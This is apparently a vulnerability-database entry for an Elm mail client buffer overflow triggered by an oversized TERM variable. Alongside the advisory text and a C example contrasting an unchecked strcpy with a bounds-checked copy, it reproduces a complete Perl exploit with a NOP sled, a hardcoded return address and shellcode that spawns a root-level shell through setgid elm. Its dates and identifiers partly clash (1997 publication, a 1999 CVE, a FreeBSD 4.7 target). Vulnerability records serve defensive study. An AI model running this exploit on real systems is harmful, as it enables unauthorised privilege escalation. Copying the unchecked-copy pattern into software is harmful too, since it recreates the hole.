Elm Buffer Overflow Vulnerability

Vulnerability ID: 1105298
Vulnerability type: Buffer overflow
Published: 1997-05-13
Updated: 1997-05-13
CVE ID: CVE-1999-1184
CNNVD ID: CNNVD-199705-012
Platform: Linux
CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/22836
https://www.securityfocus.com/bid/83053
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199705-012
|Vulnerability details
Elm 2.4 and earlier versions contain a buffer overflow. A local user can gain privileges via an overly long environment variable.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/8030/info

A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun.

As Elm is installed setgid on some systems, the exploitation of this vulnerability could potentially allow for the elevation of local privileges.
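The defect class the advisory describes is a fixed-size internal buffer filled from the TERM environment variable with no length check. The following is an added example, not Elm's code and not part of the original advisory: the unchecked copy beside a hardened version that measures the value within the buffer size and rejects anything that would not fit. The 64-byte buffer size is an assumption, since the page does not state Elm's actual buffer size.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the internal buffer that receives TERM; the page does
 * not state Elm's real size, so this value is a placeholder. */
#define TERM_BUF_SIZE 64

/* Vulnerable pattern, as the advisory describes it: the environment value
 * is copied with no bounds check, so a TERM longer than the buffer
 * overruns it. Shown for comparison only; nothing below calls it. */
void copy_term_unchecked(char *dst, const char *term)
{
    strcpy(dst, term);
}

/* Hardened form: look for the terminator without scanning past dstsz
 * bytes, reject any value that would not fit together with its NUL, and
 * always leave dst terminated. Returns 0 on success, -1 when rejected. */
int copy_term_checked(char *dst, size_t dstsz, const char *term)
{
    const char *end;

    if (dst == NULL || dstsz == 0)
        return -1;
    if (term == NULL)
        term = "dumb";                  /* fallback when TERM is unset */
    end = memchr(term, '\0', dstsz);    /* terminator must lie within dstsz */
    if (end == NULL)
        return -1;                      /* no NUL within dstsz: too long */
    memcpy(dst, term, (size_t)(end - term) + 1);  /* copies the NUL too */
    return 0;
}

/* Read TERM from the real environment through the checked copy. */
int read_term_from_env(char *dst, size_t dstsz)
{
    return copy_term_checked(dst, dstsz, getenv("TERM"));
}

int main(void)
{
    char buf[TERM_BUF_SIZE];
    if (read_term_from_env(buf, sizeof buf) == 0)
        printf("TERM accepted: %s\n", buf);
    else
        printf("TERM rejected: longer than %d bytes\n", TERM_BUF_SIZE - 1);
    return 0;
}
```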

# DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html
# shellcode by zillionATsafemode.org
# ko-elm-2.4h4.1      ELM Mail User Agent, patched for Korean E-Mail
# elm is setgid 'bin' 

$len = 512;
$ret = 0xbfbffd68;      # return address for FreeBSD 4.7-RELEASE, adjusted via $offset
$nop = "\x90";
$offset = 0;
$shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
             "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
             "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

if (@ARGV == 1) {
    $offset = $ARGV[0];
}

# NOP sled followed by the shellcode, passed in the EGG environment variable
$buffer = "";
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
local($ENV{'EGG'}) = $buffer;
local($ENV{'TERM'}) = $new_ret x 12;   # oversized TERM overruns the internal buffer
exec("elm");
|Affected products
Elm Development Group ELM 2.4

Elm Development Group ELM 2.3

|References

Source: BUGTRAQ
Name: 19970514 Re: ELM overflow
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420970&w=2
Source: BUGTRAQ
Name: 19970513
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420967&w=2
